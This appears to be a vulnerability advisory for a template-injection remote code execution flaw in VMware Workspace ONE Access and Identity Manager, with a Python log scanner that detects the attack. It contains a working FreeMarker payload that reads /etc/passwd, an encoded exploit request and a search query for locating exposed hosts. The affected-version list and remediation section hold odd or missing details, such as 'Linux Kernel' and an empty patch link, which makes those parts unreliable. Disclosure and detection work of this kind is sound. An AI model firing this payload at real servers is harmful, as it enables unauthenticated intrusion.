I. Vulnerability description
VMware Workspace ONE Access and Identity Manager contain a remote command execution vulnerability caused by server-side template injection. An unauthenticated attacker can exploit it to execute arbitrary code remotely.
II. Affected versions
- Linux Kernel
- VMware Identity Manager 3.3.3
- VMware Identity Manager 3.3.4
- VMware Identity Manager 3.3.5
- VMware Identity Manager 3.3.6
- VMware vRealize Automation
- VMware vRealize Automation 7.6
- VMware Workspace ONE Access 20.10.0.0
- VMware Workspace ONE Access 20.10.0.1
- VMware Workspace ONE Access 21.08.0.0
- VMware Workspace ONE Access 21.08.0.1
III. Vulnerable environment
fofa:icon_hash="-1250474341"
IV. Reproduction
PoC:
${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d

The response status is 200 and the body contains "Authorization context is not valid".
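
A log check for the request shape shown above, added here as an example and not part of the original advisory: it parses web access-log lines, decodes the query parameters sent to /catalog-portal/ui/oauth/verify and flags FreeMarker syntax in them. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit

# Endpoint named in the PoC request on this page.
VERIFY_PATH = "/catalog-portal/ui/oauth/verify"
# FreeMarker constructs present in the page's payload: interpolation, the ?new
# built-in and the utility package. The "<#" directive opener is an added generalization.
FTL_MARKERS = re.compile(r"\$\{|<#|\?\s*new\s*\(|freemarker\.template\.utility", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so nested encodings are normalized before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(request_target):
    """Return the query parameter names on the verify endpoint that carry template syntax."""
    parts = urlsplit(request_target)
    if parts.path.rstrip("/") != VERIFY_PATH:
        return []
    return [name for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if FTL_MARKERS.search(fully_decode(value))]

def scan(lines):
    """Yield (line_number, http_status, parameter_names) for each flagged log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            yield number, int(match.group(2)), hits

# Constructed sample: the payload string is the one already shown in the PoC request,
# and the log lines (addresses, timestamps, sizes) are made up for the example.
PAGE_PAYLOAD = '${"freemarker.template.utility.Execute"?new()("cat /etc/hosts")}'
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=abc-123 HTTP/1.1" 200 512',
    '192.0.2.77 - - [01/Jan/2024:10:00:05 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=' + quote(PAGE_PAYLOAD, safe="") + ' HTTP/1.1" 200 1804',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /index.html?q=%24%7Bx%7D HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A flagged line whose status is 200 matches the response described above and should be prioritized for triage.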
V. Remediation
1. The vendor has released a patch that fixes the vulnerability. Patch download link:
2. Use a fixed version.
- VMware Cloud Foundation
- VMware vRealize Suite Lifecycle Manager